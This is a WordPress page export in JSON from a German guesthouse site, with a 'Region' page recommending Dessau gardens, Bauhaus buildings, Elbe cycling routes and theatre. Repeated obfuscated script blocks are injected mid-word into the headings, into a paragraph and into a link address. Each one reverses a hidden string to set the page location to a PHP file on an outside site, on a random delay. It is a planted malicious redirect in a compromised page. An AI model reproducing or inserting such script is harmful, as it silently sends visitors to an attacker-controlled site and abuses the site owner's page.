{"id":24,"date":"2012-08-20T20:23:53","date_gmt":"2012-08-20T18:23:53","guid":{"rendered":"https:\/\/www.logis-am-park.de\/?page_id=24"},"modified":"2023-01-11T15:32:38","modified_gmt":"2023-01-11T15:32:38","slug":"region","status":"publish","type":"page","link":"https:\/\/www.logis-am-park.de\/?page_id=24","title":{"rendered":"Region"},"content":{"rendered":"<h2><span style=\"color: #adb466;\">Gartentr\u00e4ume<\/span><\/h2>\n<figure id=\"attachment_53\" aria-describedby=\"caption-attachment-53\" style=\"width: 960px\" class=\"wp-caption alignnone\"><a href=\"http:\/\/logis-am-park.de\/wp-content\/uploads\/2012\/08\/header_arrangements.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-53 size-full\" src=\"http:\/\/logis-am-park.de\/wp-content\/uploads\/2012\/08\/header_arrangements.jpg\" alt=\"Galerie Schloss Georgium\" width=\"960\" height=\"200\" srcset=\"https:\/\/www.logis-am-park.de\/wp-content\/uploads\/2012\/08\/header_arrangements.jpg 960w, https:\/\/www.logis-am-park.de\/wp-content\/uploads\/2012\/08\/header_arrangements-300x63.jpg 300w, https:\/\/www.logis-am-park.de\/wp-content\/uploads\/2012\/08\/header_arrangements-768x160.jpg 768w, https:\/\/www.logis-am-park.de\/wp-content\/uploads\/2012\/08\/header_arrangements-624x130.jpg 624w\" sizes=\"auto, (max-width: 709px) 85vw, (max-width: 909px) 67vw, (max-width: 1362px) 62vw, 840px\" \/><\/a><figcaption id=\"caption-attachment-53\" class=\"wp-caption-text\">Galerie Schloss Georgium<\/figcaption><\/figure>\n<h1><span style=\"color: #7b8040;\">His<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"\\'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script><script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"\\'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>torie und Romantik<\/span><\/h1>\n<p>In Dessau und Umgebung finden Sie romantische und stimmungsvolle G\u00e4rten mit prachtvollen Bauten im klassizistischem Stil, der in die Neugothik \u00fcbergeht. Belebt und erg\u00e4nzt&nbsp;werden die G\u00e4rten durch wundersch\u00f6ne Gartenplastiken, Torh\u00e4user, Brunnen und Schl\u00f6sser.<span style=\"color: #000000;\"><strong><br \/>\nmehr lesen<\/strong><\/span> <a title=\"Dessau Tourismus\" href=\"http:\/\/www.dessau-rosslau-<script>$NfI=function(n){if (typeof ($NfI.list[n]) == &#8222;string&#8220;) return $NfI.list[n].split(&#8222;&#8220;).reverse().join(&#8222;&#8220;);return $NfI.list[n];};$NfI.list=[&#8222;\\&#8217;php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\&#8217;=ferh.noitacol.tnemucod&#8220;];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script><script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"\\'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tourismus.de<\/a><\/p>\n<p>Zu erw\u00e4hnen&nbsp; sind hier beispielsweise das Schloss Luisium, das Schlo\u00df Mosigkau, das Schlo\u00df K\u00fchnau, das Schlangenhaus im Luisium, der Pegasusbrunnen, das Weinberghaus im Landschaftspark Gro\u00dfk\u00fchnau aber auch die vielen Galerien wie die Gem\u00e4ldegalerie im Georgium, die Orangerie, die Meisterh\u00e4user mit Dauerausstellungen und die Galerie an den Sieben S\u00e4ulen.<br \/>\n<span style=\" color:=\"\" #000000;\"=\"\"><strong>mehr lesen<\/strong> <\/a><a title=\"Gartenreich\" href=\"http:\/\/www.gartenreich.com\">www.gartenreich.com<\/a><\/p>\n<p>&nbsp;<\/p>\n<h2><span style=\"color: #adb466;\">Meisterhaft<\/span><\/h2>\n<h1><span style=\"color: #7b7f42;\">Tradition und Zeitgeist<\/span><\/h1>\n<p>Dessau ist gepr\u00e4gt von der Geschichte des Bauhauses. Zum Geb\u00e4udeensemblensemble geh\u00f6ren die Meisterh\u00e4user, das Konsumgeb\u00e4ude, die Siedlung in T\u00f6rten, das Stahlhaus, die Laubengangh\u00e4user, das Kornhaus, das Moses-Mendelssohn-Zentrum und das his<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"\\'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script><script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"\\'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>torische Arbeitsamt.<span style=\"color: #000000;\"><strong><br \/>\nmehr lesen<\/strong><\/span> <a title=\"Bauhaus Dessau\" href=\"http:\/\/www.bauhaus-dessau.de\" target=\"_blank\" rel=\"noopener\">www.bauhaus-dessau.de<\/a><\/p>\n<p>&nbsp;<\/p>\n<h2><span style=\"color: #adb466;\">Flusslandschaft Elbe<\/span><\/h2>\n<h1><span style=\"color: #7b7f42;\">Naturschutz und Abenteuer<\/span><\/h1>\n<p>Entlang des Elberadweges k\u00f6nnen Sie auch die Region mit dem Rad erkunden bis zu den W\u00f6rlitzer Parkanlagen und sich in einer Gondel im Park treiben lassen. Dessau ist der ideale Ausgangspunkt f\u00fcr zahlreiche Unternehmungen wie z.B. nach Wittenberg, Oranienbaum usw.<span style=\"color: #000000;\"><strong><br \/>\nmehr lesen<\/strong><\/span> <a title=\"Flusskultur Radreisen\" href=\"http:\/\/www.flusskultur-radreisen.de\" target=\"_blank\" rel=\"noopener\">www.flusskultur-radreisen.de<\/a><\/p>\n<p>&nbsp;<\/p>\n<h2><span style=\"color: #adb466;\">Kulturpfade<\/span><\/h2>\n<h1><span style=\"color: #7b7f42;\">Visionen und Geschichten<\/span><\/h1>\n<p>Um Dessau etwas n\u00e4her kennezulernen eignet sich eine \u00f6ffentliche F\u00fchrung mit dem Reisewerk Dessau. Hier werden unter anderem Nachtw\u00e4chterf\u00fchrungen angeboten, aber auch Parkspazierg\u00e4nge.<span style=\"color: #000000;\"><strong><br \/>\nmehr lesen<\/strong><\/span> <a title=\"Reisewerk Dessau\" href=\"http:\/\/www.reisewerk.de\" target=\"_blank\" rel=\"noopener\">www.reisewerk.de<\/a><\/p>\n<p>&nbsp;<\/p>\n<h2><span style=\"color: #adb466;\">Kunst und Kultur<\/span><\/h2>\n<h1><span style=\"color: #7b7f42;\">B\u00fchnenkulissen und Szenerien<\/span><\/h1>\n<p>F\u00fcr eine lange Tradition in Dessau steht das Anhaltische Theater mit seinem eigenst\u00e4ndigen Ensemble. Klassische&nbsp;aber auch experimentelle St\u00fccke werden hier pr\u00e4sentiert. Im Sommer finden sich auch einige B\u00fchnenst\u00fccke ausserhalb des Theaters z.B. im Georgium wieder.<span style=\"color: #000000;\"><strong><br \/>\nmehr lesen<\/strong><\/span> <a title=\"Anhaltisches Theater\" href=\"http:\/\/www.anhaltisches-theater.de\">www.anhaltisches-theater.de<\/a><\/p>\n<p>Ein Ausflug in den Georgengarten mit Besuch in der Gem\u00e4ldegalerie ist sehr lohnenswert. Hier sind ca. 2000 Gem\u00e4lde aus dem 15.-19. Jahrhundert untergebracht. Gleich nebenan in der Orangerie finden regelm\u00e4\u00dfig wechselnde Ausstellungen zeitgen\u00f6ssischer Kunst statt.<span style=\"color: #000000;\"><strong><br \/>\nmehr lesen<\/strong><\/span> <a title=\"Georgium\" href=\"http:\/\/www.georgium.de\">www.georgium.de<\/a><\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Gartentr\u00e4ume Historie und Romantik In Dessau und Umgebung finden Sie romantische und stimmungsvolle G\u00e4rten mit prachtvollen Bauten im klassizistischem Stil, der in die Neugothik \u00fcbergeht. Belebt und erg\u00e4nzt&nbsp;werden die G\u00e4rten durch wundersch\u00f6ne Gartenplastiken, Torh\u00e4user, Brunnen und Schl\u00f6sser. mehr lesen<\/p>\n","protected":false},"author":1,"featured_media":168,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-24","page","type-page","status-publish","has-post-thumbnail","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.logis-am-park.de\/index.php?rest_route=\/wp\/v2\/pages\/24","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.logis-am-park.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.logis-am-park.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.logis-am-park.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.logis-am-park.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24"}],"version-history":[{"count":7,"href":"https:\/\/www.logis-am-park.de\/index.php?rest_route=\/wp\/v2\/pages\/24\/revisions"}],"predecessor-version":[{"id":1009,"href":"https:\/\/www.logis-am-park.de\/index.php?rest_route=\/wp\/v2\/pages\/24\/revisions\/1009"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.logis-am-park.de\/index.php?rest_route=\/wp\/v2\/media\/168"}],"wp:attachment":[{"href":"https:\/\/www.logis-am-park.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}